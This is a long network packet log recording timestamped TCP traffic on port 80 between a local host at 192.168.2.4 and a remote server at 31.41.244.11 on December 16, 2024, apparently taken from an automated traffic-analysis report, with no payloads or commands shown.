                                                                                                                                                                                              Dec 16, 2024 01:01:24.258249044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.259144068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.259257078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.259341002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.260318995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.260373116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.260420084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.260466099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.261464119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.261606932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.261667967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.262665033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.262756109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.262784958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.262833118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.263848066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.263941050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.263974905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.264007092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.264966965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.265019894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.265125990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.265213966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.266160965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.266237974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.266271114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.266324997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.267335892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.267401934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.267450094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.267501116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.268532991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.268623114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.268632889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.268666983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.269754887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.269793034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.269845963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.270885944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.271017075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.271064997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.271065950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.272054911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.272135019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.272172928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.272223949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.273220062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.273298979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.273333073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.273412943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.274383068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.274449110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.274483919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.274538994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.275554895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.275614023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.275671959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.276161909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.276722908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.276772022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.276861906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.276910067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.277909040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.277981997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.278042078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.278130054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.279073000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.279125929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.279206991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.279874086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.280392885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.280448914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.280492067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.280631065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.281414986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.281466007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.281518936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.281568050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.282578945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.282753944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.282804966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.283762932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.283824921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.283862114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.283912897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.284921885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.284981012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.285048008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.285099030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.286086082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.286143064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.286199093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.286335945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.287242889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.287297964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.287395954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.287533998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.288429022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.288484097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.288561106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.288611889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.289618015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.289711952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.289773941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.290779114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.290851116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.290879011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.290930033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.291943073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.292004108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.292128086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.292181015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.293087959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.293145895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.293234110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.294329882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.294378042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.294388056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.294428110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.295469046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.295551062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.295571089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.295622110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.296627045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.296684027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.296736002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.296786070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.297804117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.297867060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.297918081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.297971010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.298948050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.299066067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.299110889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.299144030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.300136089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.300216913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.300251961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.300981045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.301387072 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.301578045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.301637888 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.302484989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.302609921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.302628040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.302676916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.303659916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.303718090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.303797007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.303864956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.304795980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.304882050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.304946899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.305002928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.306020021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.306128979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.306183100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.307177067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.307292938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.307356119 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.308357000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.308429956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.308481932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.308535099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.309528112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.309592009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.309650898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.309705019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.310692072 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.310754061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.310827017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.310887098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.311923981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.311980963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.311996937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.312196016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.313014030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.313071012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.313085079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.313136101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324183941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324239969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324274063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324322939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324383974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324440956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324457884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.324502945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.325916052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.325999022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.326009035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.326050997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.326056957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.326098919 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448374987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448430061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448447943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448515892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448724985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448776007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448859930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.448914051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.449873924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.449935913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.450021029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.450074911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451035976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451102972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451401949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451482058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451517105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.451562881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.452589035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.452661037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.452707052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.452760935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.453748941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.453810930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.453860998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.453916073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.454905987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.454977036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.455030918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.455151081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.456083059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.456140995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.456214905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.456264973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.457256079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.457310915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.457376003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.457432985 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.458429098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.458512068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.458549023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.458602905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.459614992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.459669113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.459737062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.459785938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.460769892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.460861921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.460894108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.460982084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.461954117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.462115049 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.462188959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.463128090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.463202000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.463255882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.463327885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.464297056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.464355946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.464374065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.464428902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.465477943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.465588093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.465653896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.466639996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.466727972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.466783047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.467817068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.467875004 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.467941046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.467989922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.469007015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.469063044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.469073057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.469115019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.470129967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.470218897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.470263004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.470308065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.471307993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.471445084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.471502066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.472500086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.472567081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.472616911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.472667933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.473668098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.473786116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.473845959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.474823952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.474890947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.474945068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.475060940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.475982904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.476113081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.476178885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.477174044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.477230072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:24.477272034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:24.477328062 CET4980080192.168.2.431.41.244.11
